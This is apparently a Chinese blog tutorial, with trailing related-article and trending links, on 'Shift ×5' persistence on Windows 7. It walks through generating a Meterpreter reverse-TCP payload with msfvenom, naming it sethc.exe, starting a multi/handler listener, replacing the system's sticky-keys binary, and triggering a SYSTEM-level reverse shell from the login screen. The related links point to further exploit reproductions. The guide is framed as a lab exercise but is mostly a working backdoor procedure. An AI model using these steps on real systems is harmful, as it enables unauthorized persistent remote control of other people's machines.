操作系统: Windows 7 旗舰版

工具: kali系统的msfconsole

5次shift维权原理

Windows系统中,5次shift键可以触发粘滞键,也就是C:\Windows\System32\sethc.exe,我们将cmd.exe改成sethc.exe并替换掉原来的粘滞键,就可以在登录界面通过5次shift键执行cmd,并且是system权限

除此以外,还可以使用其他工具替换sethc.exe

第一步,使用kali的msfconsole生成木马工具

1.开启MSF

msfconsole

2.使用开发模块

use exploit/multi/handler

3.生成木马,lhost写自己的ip,lport写自己的端口,作用是反弹shell到指定ip的端口

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.18.128 lport=4444 -f exe -o sethc.exe

4.因为我是在桌面打开的终端,生成的木马文件会在用户的根目录下,打开另一个终端查看文件位置

第二步,监听端口,接收反弹的shell

1.生成payload

set payload windows/meterpreter/reverse_tcp

2.设置反弹shell的位置( 自己的ip )

set lhost 192.168.18.128

3.设置反弹的端口

set lport 4444

4.开启监听

exploit

第三步,替换sethc.exe

将生成的木马工具上传到目标主机的c:/windows/system32目录下,并替换原有的sethc.exe

源sethc.exe不能直接修改或删除,需要修改权限

第四步,5次shift触发sethc.exe并反弹shell

1.在目标主机按5次shift触发sethc.exe,没有任何反应,因为程序被替换了

2.查看kali的监听状态,输入 shell 可进入目标主机的命令行,并执行系统命令

Windows系统利用5次shift维权漏洞复现相关推荐

1. MS08-067远程代码执行漏洞(CVE-2008-4250) | Windows Server服务RPC请求缓冲区溢出漏洞复现

   MS08-067远程代码执行漏洞(CVE-2008-4250) | Windows Server服务RPC请求缓冲区溢出漏洞复现 文章目录 MS08-067远程代码执行漏洞(CVE-2008-4250 ...

2. Windows网络服务渗透测试实战MS17-010漏洞复现

   一.实验项目名称 Windows网络服务渗透测试实战MS17-010漏洞复现 二.实验目的及要求 熟悉Metasploit终端的使用方法: 掌握对MS17-010漏洞攻击的方法. 三.复现步骤(附加文 ...

3. cve-2020-0796_CVE20200796 | Windows SMBv3客户端/永痕之黑漏洞复现

   0x01 漏洞介绍 2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,Microsoft Guidance for Disabling SMBv3 ...

4. 在Windows系统利用IP地址登陆Linux服务器

   服务器及其作用 什么是服务器呢? 服务器: 也称伺服器,是一种高性能计算机,提供计算服务的设备,即服务器可看为是一台功能配置强大的电脑,有独立的操作系统,其中核心系统以Linux系统为主的服务器,我们 ...

5. 2021-08-27 网安实验-Windows系统渗透测试之.NET框架0Day漏洞(CVE-2017-8759)

   实验步骤一 1.首先从网上下载CVE-2017-8759漏洞exp到本地目录: git clone https://github.com/bhdresh/CVE-2017-8759.git 生成漏洞文 ...

6. 网站apache环境S2-057漏洞 利用POC 远程执行命令漏洞复现

   S2-057漏洞,于2018年8月22日被曝出,该Struts2 057漏洞存在远程执行系统的命令,尤其使用linux系统,apache环境,影响范围较大,危害性较高,如果被攻击者利用直接提权到服务器 ...

7. win7系统smb永恒之蓝【漏洞复现】

   介绍 永恒之蓝(Eternal Blue)是一种利用windows的系统的SMB协议漏洞来获取系统最高权限,从而达到入侵计算机目地的漏洞,于2017年4月14日晚,黑客团体Shadow Brokers ...

8. Windows系统漏洞学习总结

   Windows系统常见漏洞分析 由于windows NT/2000操作系统的普及率和市场占有率比较高,所以很容易使它成为很多黑客攻击的目标.目前,Windows NT/2000最主要的漏洞有Unico ...

9. 【网络安全学习实践】Windows系统密码破解防护及用户和组管理

   halo~我是bay_Tong桐小白 本文内容是桐小白个人对所学知识进行的总结和分享,知识点会不定期进行编辑更新和完善,了解最近更新内容可参看更新日志,欢迎各位大神留言.指点 [学习网络安全知识,维护 ...

最新文章

1. 构建负载均衡服务器之二 LVS详解及应用
2. 2019.3.18 区块链论文翻译
3. python求矩形面积_关于python:创建矩形类
4. 面试官 | 如何在 Spring Boot 中进行参数校验？
5. 【英文写作日知录 第1期】句式汇总 Sun, 05 July 2020
6. Java 的布局管理器GridBagLayout的使用方法【图文说明】
7. 前端自动化工具gulp入门基础
8. java 多个数字_java 输入多个数字
9. 最有创意的万圣节借势海报都在这里
10. vue滚动条禁止_vue.js中实现禁止浏览器滚动方法
11. linux 清空进程recv q,Linux中ss命令Recv-Q和Send-Q详解
12. centos7 docker安装_Docker安装运行并连接Centos7容器
13. Django+xadmin的安装与配置
14. 【ATSC】韩国:2017年将迎来ATSC3.0广播时代
15. android qq 退出帐号,大家手机上的QQ平常用完退不退出帐号
16. NetSuite 财务科目合并
17. 麦克马斯特大学计算机的强项,阿尔伯塔大学和麦克马斯特大学哪所学校好？
18. EA游戏Battlefield 2(战地风云2) 单机地图简介
19. JAVA:日期时间范围查询0点到23点59分59秒之间
20. 学习ZYNQ之FPGA2(开发板资源初探)

热门文章

1. 记一次java-selenium自动抢红包最简单案例1
2. CompletableFuture 详解
3. HDU 2844 Coins 多重背包
4. Apache 简单设置虚拟主机
5. MySQL -- 创建用户并提升用户权限
6. python_开发环境介绍_交互模式使用_IDE介绍和使用---python工作笔记010
7. springcloud工作笔记098---springcloud多项目包扫描问题
8. 数据库工作笔记018---MySQL 中 You can't specify target table '表名' for update in FROM clause错误解决办法
9. VB.NET工作笔记005---用visual studio2017 编写WCF vb.net webservice
10. fckeditor组件使用---配置FCKeditor,以及使用方法2